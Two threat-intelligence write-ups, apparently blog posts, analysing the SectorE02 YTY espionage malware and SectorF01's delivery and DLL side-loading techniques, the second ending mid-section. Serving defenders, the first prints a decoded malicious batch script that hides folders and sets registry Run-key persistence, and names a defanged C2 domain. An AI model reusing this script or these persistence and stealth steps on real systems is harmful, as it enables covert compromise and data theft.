SectorE02 Updates YTY Framework in New Targeted Campaign Against Pakistan Government


From March to July this year, the ThreatRecon team noticed a spear phishing campaign by the SectorE02 group going on against the Government of Pakistan and organizations there related to defense and intelligence. Spear phishing emails are sent to their victims via Excel XLS files, which asks their victims to enable macros which will end up executing the downloader. Malicious document lures they have employed in recent times include a document purporting to be for registration for the Pakistan Air Force.

Security advisory by the Pakistan government regarding targeted attacks

SectorE02 is a threat actor which targets countries in South Asia, especially Pakistan, since at least 2012. Their arsenal includes a modular framework researchers have dubbed the “YTY Framework”, which has a Windows and mobile version. Usage of this framework allows the SectorE02 group to constantly modify and even remake individual plugins of the framework, and pick and choose which plugins – if any – are sent to their victims. This modularity also allows the SectorE02 group to maintain low detections by antivirus engines because each module only does something simple and will not even work without certain previously dropped files. In this post, we will describe their lure document, first stage downloader, file plugin, screenshot plugin, keylogger plugin, and exfiltration uploader plugin.

Excel Spear Phishing

The excel file used by them had names such as Credit_Score.xls, Advance_Salary.xls, CSD_Schemes_2019.xls, and Agrani_Bank.xls. In some instances, it masqueraded as an Excel calculator from the National Bank of Pakistan.

Lure document 1

In later stages of the campaign, however, the group appeared to switch to using a MsgBox to show an error saying “This file is corrupted”.

Lure document 2

At the back, the excel macro would retrieve encoded data stored in itself, and the encoding here is just a simple decimal encoding with a comma (or exclamation mark) as a separator. The same encoding is used for the dropped executable, although more often one entire file is encoded as a zip archive containing two files – a batch script and executable which is then unzipped and executed.

All four files here are illustration copied files from the original “.txt”, “.pdf”, and “.inp” files which are actually executable binaries
Example Encoded Batch File in XLS Doc using Comma Separator

The dropped batch scripts follow the same basic format: creating folders with the hidden, system, and archive attributes, dropping the batch and executable files there, and setting persistence through either scheduled tasks or the autorun registry key. A text file containing the %COMPUTERNAME% variable and random digits will also be saved as “win.txt”, and this file is required for the executable downloader.

A dump showing the scheduled task created by the batch script

The batch file that is dropped is used for three main purposes: 1) to set up the first folder, which is used to store the text file containing the computer name, 2) to set up what we call the “common exfiltration folder” which each individual plugin uses for different purposes, and 3) to set up persistence via scheduled task or registry run keys.

Example Decoded Batch File in XLS Doc
/echo off rd /s /q %USERPROFILE%\Printers\Neighbourhood\Spools rd /s /q %USERPROFILE%\Print\Network\Server rd /s /q %USERPROFILE%\DriveData\Files rd /s /q %USERPROFILE%\DriveData\Wins md %USERPROFILE%\Printers\Neighbourhood\Spools md %USERPROFILE%\DriveData\Files md %USERPROFILE%\DriveData\Wins md %USERPROFILE%\Print\Network\Server attrib +a +h +s “%USERPROFILE%\DriveData” attrib +a +h +s “%USERPROFILE%\Printers” attrib +a +h +s “%USERPROFILE%\Print” SET /A %COMPUTERNAME% SET /A RAND=%RANDOM% 10000 + 1 echo %COMPUTERNAME%-%RAND% >> %USERPROFILE%\DriveData\Files\win.txt echo %COMPUTERNAME%-%RAND% >> %USERPROFILE%\DriveData\Wins\win.txt reg delete “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v Files /f reg delete “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v Wins /f reg delete “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v BigSyn /f reg delete “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v Dataupdate /f reg add “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v Files /t REG_SZ /d %USERPROFILE%\DriveData\Wins\juchek.exe reg add “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v Wins /t REG_SZ /d %USERPROFILE%\DriveData\Files\svchots.exe reg add “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v BigSyn /t REG_SZ /d %USERPROFILE%\DriveData\Files\lssms.exe reg add “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v BigUpdate /t REG_SZ /d %USERPROFILE%\DriveData\Files\lssmp.exe reg add “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v Dataupdate /t REG_SZ /d %USERPROFILE%\DriveData\Files\kylgr.exe move %userprofile%\AppData\juchek.ttp %userprofile%\DriveData\Wins ren %userprofile%\DriveData\Wins\juchek.ttp juchek.exe del %0

Downloader (b874a158f019dc082a0069eb3f7e169fbec2b4f05b123eed62d81776a7ddb384)

Looking at the latest downloader executable which masquerades its filename as an InPage word document (bgfRdstr54sf.inp), it starts off by using CreateEventA as a mutex with the value “ab567” and only works if the file %USERPROFILE%\DriveData\Files\win.txt exists. It polls the C2 server every 100 or so seconds. It uses the fixed user agent string “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0”, and performs a HTTPS GET against servicejobs[.]life/orderme/<computername>-<random>.

This is a change from their previous URL structure, “/orderme”, which contained the file(s) to be downloaded, and this allows them to cherry pick their victims – unless the SectorE02 operator specifically places the next stage malware in the server directory for a particular victim, that victim will only ever be infected with the downloader.

The downloader malware accepts three commands from the server, when the Content-Type response is “Content-Type: application”, “Content-Type: cmdline”, or “Content-Type: batcmd”, which are used for saving files to disk or executing files/commands on the system. This is how the next stage downloader or plugins can be executed on the victim system.

Screenshot Plugin (f10f41bd38832596d4c449f81b9eb4129361aa4e4ebd4a8e8d2d8bf388934ca5)

This executable plugin takes a screenshot every two minutes using the Windows API to draw the raw screen bitmap to the common exfiltration folder, %USERPROFILE%\Print\Network\Server\. It then converts this raw bitmap to a JPG in a new file and deletes the raw bitmap file.

Code in the screenshot plugin creating the raw bitmap

The screenshot files are named in the format of “tm_hour-tm_min-tm_sec-tm_year-tm_mday-tm_mon” [1].

Screenshot JPGs created by the screenshot plugin

Like some of the other YTY components, the obfuscated strings can be deobfuscated by running both the base64 and reverse string algorithm multiple (in this case, three) times.

The strings can be deobfuscated by running both the base64 and reverse algorithm three times

File Listing Plugin (d71a1d993e9515ec69a32f913c2a18f14cdb52ef06e4011c8622b5945440c1aa)

This executable plugin recursively searches through the “C:”, “D:”, “E:”, “F:”, “G:”, and “H:” drives, looking for interesting file extensions shown below. Several default folders are avoided by the malware.

Note that the “.inp” extension is for “Urdu InPage”, a word processing program which supports languages such as Urdu which is the national language of Pakistan. The extensions the 2019 version of this plugin did not previously look for are “.odt” and “.eml”, and “.rft” is just a spelling mistake they made of “.rtf”.

The latest version of the plugin looks for files with containing any of 14 different file extensions

It only looks for files modified later than year 2017 and saves the text data of all matching files found in %APPDATA%\DriveData\Files\clist.log using the format of “File Path|Size WriteTimestamp l_flag”.

File path and names for exfiltration are saved to a clist.log file

A copy of these matching files are also saved to the common exfiltration folder, %USERPROFILE%\Print\Network\Server\. The copied files are individually saved with the file names being the full file path to the copied file, with slashes becoming underscores.

Exact copies of files the plugin is looking for is saved to the common exfiltration folder

Keylogger Plugin (f331f67baa2650c426daae9dee6066029beb8b17253f26ad9ebbd3a64b2b6a37)

This plugin starts off by using CreateEventA as a mutex with the value “k4351”. It saves user keystrokes and which window title those keystrokes were pressed in the common exfiltration folder, %USERPROFILE%\Print\Network\Server\. The file is saved as “<username>_YYYY_MM_DD(HH_mm_ss).txt”.

Example of input captured by the keylogger plugin

Uploader Plugin (d4e587b16fbc486a62cc33febd5438be3a9690afc1650af702ed42d00ebfd39e)

This plugin starts off by using CreateEventA as a mutex with the value “MyEvent3525” and only works if the file %USERPROFILE%\DriveData\Files\win.txt exists . While the other plugins dump their files into the common exfiltration folder, the uploader plugin takes the files from that folder and uploads it to the C2 server, which is the same server as the downloader C2 server. The uploaded files are deleted immediately after.

The uploader performs a HTTP POST to /upload/<computername> of the file using HTTP forms with the same hard coded user-agent as their downloader malware, “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0”.

Data sent to the C2 server through HTTPS for exfiltration


While the use of a modular framework is not a new concept, we see that the SectorE02 group’s continuous remaking of their YTY framework plugins which serve the same purpose allows them to keep detections by security tools at a minimum. Based on their campaigns and the plugins we have seen, we believe they may be recreating each plugin on a per-campaign basis, meaning that each attack campaign might be targeting with new binaries coded from scratch and be hardly detected by security tools. At the same time, their newfound cautiousness in protecting their binaries from being downloaded and limited targeting means that the hardest part of detecting and responding to the SectorE02 group may be finding their related binaries in the first place.

Indicators of Compromise

Malicious Excel Files (SHA-256)


Dropped Batch Scripts (SHA-256)


Dropped YTY Downloaders (SHA-256)


YTY File Plugin


YTY Screenshot Plugin


YTY Keylogger Plugin


YTY File Exfiltration Uploader Plugin


IP Addresses




MITRE ATT&CK Techniques

The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these malware.

Initial Access

T1193 Spearphishing Attachment


T1059 Command-Line Interface
T1053 Scheduled Task
T1064 Scripting
T1204 User Execution


T1158 Hidden Files and Directories
T1060 Registry Run Keys / Startup Folder
T1053 Scheduled Task

Defense Evasion

T1140 Deobfuscate/Decode Files or Information
T1107 File Deletion
T1158 Hidden Files and Directories
T1066 Indicator Removal from Tools
T1112 Modify Registry
T1027 Obfuscated Files or Information
T1064 Scripting

Credential Access

T1056 Input Capture


T1010 Application Window Discovery
T1083 File and Directory Discovery
T1082 System Information Discovery
T1497 Virtualization/Sandbox Evasion


T1119 Automated Collection
T1005 Data from Local System
T1039 Data from Network Shared Drive
T1025 Data from Removable Media
T1074 Data Staged
T1114 Email Collection
T1056 Input Capture
T1113 Screen Capture

Command and Control

T1043 Commonly Used Port
T1071 Standard Application Layer Protocol


T1020 Automated Exfiltration
T1041 Exfiltration Over Command and Control Channel


[1] Microsoft Docs | localtime, _localtime32, _localtime64

The Growth of SectorF01 Group’s Cyber Espionage Activities


Since 2013, there has been a hacking group receiving support from the national level which conducts cyber espionage campaigns against countries in the South China Sea. We refer to this group as SectorF01. From 2017, their activities have increased significantly. They mainly carry out these campaigns against government agencies and diplomatic, military, and research institutions in neighboring countries, and surveillance activities against opposing forces in their own countries.

In recent years, the SectorF01 group has been engaged in cyber espionage against various industries for its own benefit. They put extra focus on the automobile industry, and their targets countries have expanded to include South Korea and Japan as well, which are in the East Asian region. We decided to take a step-by-step look at more than 800 types of malware used by the SectorF01 group from 2013 until now (H1 2019). In this post, we will focus on the initial penetration methods that the SectorF01 group uses against their targets. We will see that they love using DLL side-loading.


Target Countries

The SectorF01 group conducts cyber espionage mainly in countries in Southeast Asia and East Asia. The victims are the countries around the South China Sea, and these countries belong to the Association of Southeast Asian Nations (ASEAN).

The SectorF01 group’s intensive attack targets are in the following countries:

• Vietnam
• China
• Cambodia
• Laos
• Thailand
• Myanmar
• Phillipines
• Malaysia
• Indonesia
• Singapore

Recently, they have also been expanding their cyber espionage activities to the following countries in East Asia:

• Japan
• South Korea

Targets of the SectorF01 group

The ellipses marked with red dotted lines are the range of countries targeted by the SectorF01 group, and the dark red ellipses are the range of countries where the attack is more concentrated. The ellipses, marked with orange dotted lines, are a range of countries that have recently been included in the attack target as the SectorF01 group expands their activities.

Target Industries

The SectorF01 group conduct cyber espionage activities against various fields as follows:

• Vietnamese dissidents, journalists, and activists
• ASEAN-related organizations
• Government institutions
• Diplomatic institutions
• Military institutions
• Marine-related organizations : Maritime organizations, marine research institutes, shipping companies, etc
• Scientific research institutes
• Universities and educational institutions
• Foreign companies in Vietnam
• Automotive Industry

Statistics for Cyber Espionage Activities in SectorF01 Group

The SectorF01 group has seen steady annual grown since its inception as a cyber espionage player in 2013 and has become one of the most influential threat actor groups in Southeast Asia. We created statistics about their activities through the more than 800 malware executables that the SectorF01 group used to attack.

About 800 malwares used in the statistics are all Windows executables. Polymorphic binaries which are executed by sandboxes and whose file hashes change each time they are run are excluded from these statistics, so only the initial file is included. We are excluding such polymorphic binaries which are not used in attacks to minimize statistical errors and misinterpretation.

This is a graph aggregating the number of malwares used in attacks by the SectorF01 group every year. It can be seen that the number of malware that they use each year is steadily increasing.

The Growth of the SectorF01 group’s Malware

The following are the statistics for the time and day when the SectorF01 group created the malware. We have analyzed about seven years of cyber espionage activity of the SectorF01 group and have concluded that they are highly likely to be threat actor groups sponsored by the Vietnamese government. We created statistics on compile times with the timestamp of about 500 binaries, after excluding those considered to have modified timestamps among the 800 binaries.

Assuming that the SectorF01 group is active in Vietnam, we set the time zone to “UTC+7″(Vietnam time zone) and created statistics based on that. Considering that the business hours in Vietnam are mainly from 8:00 am to 5:00 pm, about 68% of the malwares were created in Vietnam business hours. Also, binaries were rarely created at lunch time.

SectorF01 Group’s Malware Compile Time (UTC+7)

Next, we created statistics for the days when the SectorF01 group created binaries. The SectorF01 group made binaries on weekdays rather than weekends. About 86% of malware were made on weekdays. Among them, most binaries were produced on Mondays.

The days of the week that the SectorF01 group compiled their binaries

SectorF01 Groups’s Initial Access Tactics

The SectorF01 group uses a variety of methods for initial penetration. They mainly use malware delivered to the target via email attachments and at other times, infect specific targets that access websites via watering hole attacks. Here we describe the various initial penetration methods they have used.

Spearphishing Attachment & Spearphishing Link

The SectorF01 group usually delivers their malware through email attachments or links. The definition of these techniques can be found in the MITRE ATT&CK Framework.

“Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution.”
MITRE ATT&CK – T1193, Spearphishing Attachment

“Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments.”
MITRE ATT&CK – T1192, Spearphishing Link

Below, we can see the various ways malware is sent through attachments or links in emails used by the SectorF01 group.

Delivery Method 1: How Executable Files are Delivered

(1.1) Executable file disguised as normal document file

The SectorF01 group uses a executable that masquerades as a normal document file, such as a Word or PDF document, etc., causing the user to mistake the document file for execution. They change the icon of the file to the icon of the document program or add a document file extension such as “.doc” or “.pdf” before the “.exe” executable file extension. This causes the user to mistake the file as a document file. These executables are usually compressed and delivered in the form of email attachments.

(1.2) Malware disguised as normal program

The SectorF01 group changes the malware file name to be a file name of a normal program such as a web browser installation file (Firefox, Chrome), or an Adobe Flash web browser plug-in installation file. In addition, malware was distributed by disguising as a normal program used only in the target country.

Malware disguised as normal program installation file

(1.3) Malware using the “Space after Filename” technique

The SectorF01 group uses the “Space after Filename” technique to make the executable look like a normal document file. Inserting the document file extension, such as “.doc”, “.docx”, before the “.exe” extension, and inserting many spaces in the middle. Depending on the size of the filename field, the long “.exe” extension will not be visible due to the long space, and the user might misunderstand the executable as a document file.

Executable file disguised as document file through “Space after Filename” technique

(1.4) Malware contained in RAR archive

The SectorF01 group mainly creates malware in the form of compressed archives for delivering malicious executable files or document files and delivers them to the attack target. The compression formats they have used in the past are RAR, ZIP, GZIP, though the SectorF01 group mainly uses the RAR compression format.

Malware included in RAR archive

(1.5) SFXZIP autorun compressed file malware

The SectorF01 group also uses SFX (self-extracting archive) autorun compression file malware. They utilize the WinRAR program’s ability to generate SFX compressed files to generate malware with the ZIP compression format rather than the RAR compression format.

SFX compressed file creation method of ZIP compression format using WinRAR program
ZIP compression format SFX compressed file type malware

(1.6) Malware distribution method using HTA

The SectorF01 group uses HTA to spread malware. HTA stands for Microsoft HTML Applications and uses the “.hta” extension. A typical HTA file is configured to be similar to a HTML file, but is run as a separate utility program called “mshta.exe”, not a web browser like Internet Explorer. The SectorF01 group spreads malware by including VBScript in the “.hta” file, and that VBScript works by dropping the embedded malware or downloading additional malware. The advantage here is that while VBScript has limited privileges in a web browser due to security controls, these security controls are bypassed when the VBScript is executed via a HTA file.

Malware delivered in the form of an HTA file
VBScript to generate malware contained in HTA file

(1.7) Malware distribution method using Shortcut (LNK)

The SectorF01 group uses shortcut (“.lnk”) files to spread malware. Such LNK files can execute commands. They set the LNK file to run VBScript code using the “mshta.exe” program. It is delivered to the target by disguising icons and extensions which look like word document files. If the target mistakes the LNK file for a document file and executes it, then the VBScript code is executed to download and execute an additional malware file from a server.

The following is a malicious LNK file used by the SectorF01 group:

Malware delivered in the form of an LNK file
Malicious LNK files to download and run additional malware

(1.8) Deliver malware download link using cloud service

The SectorF01 group uses Amazon’s AWS S3 and Dropbox cloud storage services to upload malware, and that link is delivered via email.

Delivery Method 2: How malware is executed using macros

(2.1) Attacks using macros contained in a document

The SectorF01 group mainly delivers word documents containing macros to the target. The filename of the document is set to be something the target might be interested in and they attach the document to their email. The victim will not be infected if the malicious macro does not run, so the document body contains a social engineering technique to encourage the user to activate the macro.

Malicious Word document file with macros
Malicious macros contained in Word documents

(2.2) Attacks that convert macros to ActiveMime form

Word document files containing traditional malicious macros are more easily detected by security solutions such as antivirus and anti-spam filters. To bypass this, the SectorF01 group also uses the ActiveMime format. ActiveMime is an undocumented Microsoft file format that encodes macros in Microsoft Office. When you convert a Microsoft Office document that contains a macro to the “.mht (Microsoft Web Archive)” format, the macro is included in the “.mht” file in ActiveMime format. These converted macros can bypass security solutions because they can be detected only by analyzing the ActiveMime format.

The SectorF01 group changed the extension of the malicious document which was converted to “.mht” file format to the “.doc” extension and attached it to the email and delivered it to the target.

MHT malware with ActiveMime masquerading as a DOC file
ActiveMime format with malicious macros
A screen Run Word document file containing macro converted to ActiveMime

Delivery Method 3: Deploy malware using vulnerabilities

The SectorF01 group exploits vulnerabilities that are frequently used. These exploits are already used by many attackers, so it can mask the attacker’s characteristics to some extent.

(3.1) CVE-2017-0199

The CVE-2017-0199 vulnerability is a vulnerability that occurs because Microsoft Office programs does not properly handle OLE objects. A malicious file such as HTA (HTML Application) can be downloaded and executed from a remote server through a vulnerability that occurs when MS Office processes URL Moniker object.

The SectorF01 group used the CVE-2017-0199 vulnerability to deliver an RTF document containing a malicious OLE2link object to the target. The OLE2link object downloads the VBScript HTA file containing the Powershell command to run.

(3.2) CVE-2017-8570

The CVE-2017-8570 vulnerability is a vulnerability that occurs because Microsoft Office programs can not properly handle OLE objects. This vulnerability exists in the way MS Office handles Composite Moniker objects and can execute SCT (Windows Script Component) scripts included in OLE packages.

The SectorF01 group uses the CVE-2017-8570 vulnerability to deliver an RTF document containing a malicious “.sct” file that generates malware to the target.

Malicious documents using CVE-2017-8570 vulnerability

(3.3) CVE-2017-11882

The CVE-2017-11882 vulnerability is a vulnerability that occurs when the Equation Editor (EQNEDT32.EXE), a component of the MS Office program, fails to properly handle certain objects. While MS Office is processing certain objects in memory, it can execute arbitrary code through the vulnerability.

The SectorF01 group attacked by delivering a malicious RTF document with shellcode for generating malware using the CVE-2017-11882 vulnerability to the target.

Malicious documents using CVE-2017-11882 vulnerability
CVE-2017-11882 Vulnerability Code

(3.4) CVE-2018-20250

The CVE-2018-20250 vulnerability occurs in UNACEV2.dll, which is included in the compression program WinRAR. This is a vulnerability that can generate a file in a specific path by manipulating the file name field in the processing of ACE compression format. This allows an attacker to create an executable file in a path where the file can be executed automatically at system boot time, such as a “startup program”.

As many threat actor groups began to use the CVE-2018-20250 vulnerability, the SectorF01 group also did the same.

Malware using CVE-2018-20250 vulnerability

Delivery Method 4: Drive-by Compromise (Watering Hole)

The SectorF01 group infects targets that access legitimate sites by inserting malicious scripts into the normal website after hacking it in order to steal account information or to infect malware. This attack is known as Drive-by Compromise. Attackers choose websites that are frequently visited by specific targets rather than indiscreet website hacking, and this attack is also called a watering hole attack.

“A drive-by compromise is when an adversary gains access to a system through a user visiting a website over the normal course of browsing. With this technique, the user’s web browser is targeted for exploitation.”
MITRE ATT&CK – T1189, Drive-by Compromise

The SectorF01 group targeted specific individuals or organizations by attacking websites that were primarily visited by key personnel and activists who opposed the Vietnamese government. They have also attacked websites of government, diplomacy, defense and research areas of Vietnam, including Cambodia, China, Laos and the Philippines, and hacked ASEAN-related websites.

The following is the timing of the large-scale watering hole attacks by the SectorF01 group:

• May 2014, September 2014
• January 2015, March 2015
• May 2017
• September 2018, December 2018
• January 2019

When a target accesses a specific web site, the attacker distributes malware disguised as a web browser program or a plug-in, or displays a fake login page for collecting credential data. They also created domains similar to a normal website or online services and malicious scripts were inserted into fake domain websites to collect information about their targets.

TOO MUCH LOVE for DLL Side-Loading

The SectorF01 group prefers the “DLL Side-Loading” technique to execute their malware. DLL side-loading technique is also called “DLL Hijacking”, “DLL Preloading”, and “DLL Planting”. The MITRE ATT&CK Framework defines “DLL Side-Loading” as follows.

“Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable to side-loading to load a malicious DLL. Adversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process.”
Definition of DLL Side-Loading

When DLLs are loaded in Windows OS, the order of searching is as follows:

1. The directory from which the application loaded.
2. The current directory.
3. The system directory. Use the GetSystemDirectory function to get the path of this directory.
4. The 16-bit system directory. There is no function that obtains the path of this directory, but it is searched.
5. The Windows directory. Use the GetWindowsDirectory function to get the path of this directory.
6. The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the App Paths registry key. The App Paths key is not used when computing the DLL search path.
Dynamic-Link Library Search Order

Because the DLL file is in the same directory path as the executable file, that DLL is loaded as it has the load highest priority. The SectorF01 group distributes the legitimate file and the malicious DLL file together so that they are in the same path. This will load the malicious DLLs together when the normal file is executed.

This will make it seem as though it is a DLL file being loaded by a legitimate program and this can bypass detection of an endpoint security solution that performs behavior-based detection.

The SectorF01 group has distributed MS Windows OS files or popular programs with DLLs to load their malicious DLL files. In some cases, the legitimate files of famous anti-virus software are also used to load malicious DLLs.

The SectorF01 group loves the “DLL Side-Loading” technique so much that they abused many legitimate programs. We wondered how many normal programs were exploited, so we summarized all the normal programs we found.

The normal program files used by the SectorF01 group for “DLL Side Loading” are as follows:

• Microsoft Office Word (WINWORD.EXE)
• Windows Search (SearchIndexer.exe)
• Windows Search (SearchProtocolHost.exe)
• Google Update (GoogleUpdate.exe)
• Adobe AcroTranscoder (AcroTranscoder.exe)
• Adobe Flash Player Control Panel Applet (FlashPlayerApp.exe)
• Adobe Acrobat 3D Utility (A3DUtility.exe)
• WeChat (WeChat.exe)
• Coc Coc Browser Update (CocCocUpdate.exe)
• 360安全浏览器 (360 Secure Browser) (360se.exe)
• 60软件管家 (360 Software Manager) (SoftManager.exe)
• Neuber Software Typograf font manager (FontSets.exe)
• McAfee VirusScan On-Demand Scan (mcods.exe)
• McAfee Oem Module (mcoemcpy.exe)
• Symantec Network Access Control (rastlsc.exe)
• Kaspersky Anti-Virus Installation assistant host (avpia.exe)
• Kaspersky Light Plugin Extension Registrar (plugins-setup.exe)
• Avast Antivirus remediation (wsc_proxy.exe)

They used major programs from Microsoft, Google and Adobe, and used popular local programs such as WeChat, Coc Coc Browser, and 360 Secure Browser. They also used programs from anti-virus vendors such as McAfee, Symantec, Kaspersky, and Avast.

Side Load 1 – Microsoft Office Word (WINWORD.EXE)

The SectorF01 group used the normal “WINWORD.EXE” file from “Microsoft Office Word” to utilize the “DLL Side-Loading” technique. The normal “WINWORD.EXE” file loads a “wwlib.dll” DLL file.

The normal “WINWORD.EXE” file sequentially searches the following paths to check if it exists in order to load the “wwlib.dll”.

The file “Ho so dang ky lam dai ly uy quyen chinh thuc cua Huyndai – Thanh Cong – Nguyen Thi Mai Phuong.exe” file has a filename related to the topic that the target may be interested in. This is the normal file “WINWORD.EXE” with only the name changed.

They set the file name of their malicious DLL to be “wwlib.dll” and deploy it in the same path along with the renamed normal “WINWORD.EXE” file. When the victim executes this renamed “WINWORD.EXE”, the malicious “wwlib.dll” file is loaded and malware is executed.

The following shows the code in “WINWORD.EXE” that loads the “wwlib.dll” exported “FMain”.

The malicious DLL “wwlib.dll” is loaded and calls the Export function “FMain”.

The “FMain” of the malicious DLL “wwlib.dll” contains the malicious code.

Side Load 2 – Windows Search (SearchIndexer.exe)

The SectorF01 group used the normal “SearchIndexer.exe” file from “Windows Search” to utilize the “DLL Side-Loading” technique. The normal “SearchIndexer.exe” file loads a “msfte.dll” DLL file.

They set the file name of their malicious DLL to be “msfte.dll” and deploy it in the same path along with the renamed normal “SearchIndexer.exe” file. When the victim executes this renamed “SearchIndexer.exe”, the malicious “msfte.dll” file is loaded and malware is executed.

The following shows the code in “SearchIndexer.exe” loading the “msfte.dll”.

Side Load 3 – Windows Search (SearchProtocolHost.exe)

The SectorF01 group used the normal “SearchProtocolHost.exe” file from “Windows Search” to utilize the “DLL Side-Loading” technique. The normal “SearchProtocolHost.exe” file loads a “msfte.dll” DLL file.

They set the file name of their malicious DLL to be “msfte.dll” and deploy it in the same path along with the renamed normal “SearchProtocolHost.exe” file. When the victim executes this renamed “SearchProtocolHost.exe”, the malicious “msfte.dll” file is loaded and malware is executed.

The following shows the code in “SearchProtocolHost.exe” loading the “msfte.dll”.

Side Load 4 – Google Update (GoogleUpdate.exe)

The SectorF01 group used the normal “GoogleUpdate.exe” file from “Windows Search” to utilize the “DLL Side-Loading” technique. The normal “GoogleUpdate.exe” file loads a “goopdate.dll” DLL file.

They set the file name of their malicious DLL to be “goopdate.dll” and deploy it in the same path along with the renamed normal “GoogleUpdate.exe” file. When the victim executes this renamed “GoogleUpdate.exe”, the malicious “goopdate.dll” file is loaded and malware is executed.

Side Load 5 – Adobe AcroTranscoder (AcroTranscoder.exe)

The SectorF01 group used the normal “AcroTranscoder.exe” file from AcroTranscoder software to utilize the “DLL Side-Loading” technique.

The normal “AcroTranscoder.exe” file loads a “Flash Video Extension.dll” DLL file.

The following is a malicious word document “FW Report on demonstration of former CNRP in Republic of Korea.doc” used by the SectorF01 group.

When this document is executed, the malicious DLL “Flash Video Extension.dll” and the renamed legitimate “AcroTranscoder.exe” are deployed in the same path. When the normal “AcroTranscoder.exe” is executed, the malicious “Flash Video Extension.dll” file is loaded and malware is executed.

The malicious DLL “Flash Video Extension.dll” is loaded and calls the Export API functions. The SectorF01 group put their malicious code in the “FLVCore :: Uninitialize” function, while all other functions point to the same address as the “FLVCore :: Uninitialize” function. Thus, as long as any Export API of the “Flash Video Extension.dll” is called, the malware is executed.

The “FLVCore :: Uninitialize” export function of the malicious DLL “Flash Video Extension.dll” contains code that performs malicious actions.

Side Load 6 – Adobe Flash Player Control Panel Applet (FlashPlayerApp.exe)

The SectorF01 group used the normal “FlashPlayerApp.exe” (Adobe Flash Player Control Panel Applet software) to utilize the “DLL Side-Loading” technique. The normal “FlashPlayerApp.exe” file loads a “UxTheme.dll” DLL file.

They set the file name of their malicious DLL to be “UxTheme.dll” and deploy it in the same path along with the renamed normal “FlashPlayerApp.exe” file. When the victim executes this renamed “FlashPlayerApp.exe”, the malicious “UxTheme.dll” file is loaded and malware is executed.

Side Load 7 – Adobe Acrobat 3D Utility (A3DUtility.exe)

The SectorF01 group used the normal “A3DUtility.exe” (Adobe Acrobat 3D Utility software) to utilize the “DLL Side-Loading” technique. The normal “A3DUtility.exe” file loads DLLs such as a “BIB.dll” DLL file.

The SectorF01 group sets the name of their malicious DLLs to “ACE.dll”, “AGM.dll”, “CoolType.dll”, “MSVCP80.dll”, “MSVCR80.dll” in addition to “BIB.dll”. They distribute these files together with the renamed normal “A3DUtility.exe” in the same path. These different DLL files are all loaded by the normal “A3DUtility.exe”.

The following shows the code in “A3DUtility.exe” loading the “AGM.dll”, “BIB.dll”, “CoolType.dll”, and so on.

“BIB.dll” is loaded and the Export API function is called. The malicious code of the SectorF01 group is inserted into the “BIB_12” function, and all other function addresses point to the “BIB_12” function address. This allows their malware to work no matter what Export API in “BIB.dll” is called. The other malicious DLLs are configured in the same way.

The exported functions of “BIB.dll”

The “BIB_12” function in “BIB.dll” contains the malicious code.

When the normal “A3DUtility.exe” is executed, the malicious DLL files is loaded and malware is executed.

Side Load 8 – WeChat (WeChat.exe)

The SectorF01 group used the normal “WeChat.EXE” (WeChat software) to utilize the “DLL Side-Loading” technique. The normal “WeChat.EXE” file loads a “WeChatWin.dll” DLL file.

WeChat is a famous Chinese messenger program.

They set the file name of their malicious DLL to be “WeChatWin.dll” and deploy it in the same path along with the renamed normal “WeChat.exe” file. When the victim executes this renamed “WeChat.exe”, the malicious “WeChatWin.dll” file is loaded and malware is executed.

Side Load 9 – Coc Coc Browser Update (CocCocUpdate.exe)

The SectorF01 group used the normal “CocCocUpdate.exe” (Coc Coc Browser Update Software) to utilize the “DLL Side-Loading” technique. The normal “CocCocUpdate.exe” file loads a “coccocpdate.dll” DLL file.

“Coc Coc Browser” is a famous web browser in Vietnam.

The following shows the code in “CocCocUpdate.exe” that loads the “coccocpdate.dll” “DllEntry” function.

They set the file name of their malicious DLL to be “coccocpdate.dll” and deploy it in the same path along with the renamed normal “CocCocUpdate.exe” file. When the victim executes this renamed “CocCocUpdate.exe”, the malicious “coccocpdate.dll” file is loaded and malware is executed.

The “DllEntry” function in “coccocpdate.dll” contains the malicious code.

Side Load 10 – 360安全浏览器 (360 Secure Browser) (360se.exe)

The SectorF01 group used the normal “360se.exe” (360安全浏览器 – 360 Secure Browser) to utilize the “DLL Side-Loading” technique. The normal “360se.exe” file loads a “chrome_elf.dll” DLL file.

“360安全浏览器(360 Secure Browser)” is a famous web browser in China.

The following shows the code in “360se.exe” that loads the “chrome_elf.dll” “SignalInitializeCrashReporting” Export API function.

They set the file name of their malicious DLL to be “chrome_elf.dll” and deploy it in the same path along with the renamed normal “360se.exe” file. When the victim executes this renamed “360se.exe”, the malicious “chrome_elf.dll” file is loaded and malware is executed.

“chrome_elf.dll” is loaded and the Export API function “SignalInitializeCrashReporting” is called.

The “SignalInitializeCrashReporting” function in “chrome_elf.dll” contains the malicious code.

Side Load 11 – 360软件管家 (360 Software Manager) (SoftManager.exe)

The SectorF01 group used the normal “SoftManager.exe” (360软件管家 – 360 Software Manager) to utilize the “DLL Side-Loading” technique. The normal “SoftManager.exe” file loads a “dbghelp.dll” DLL file.

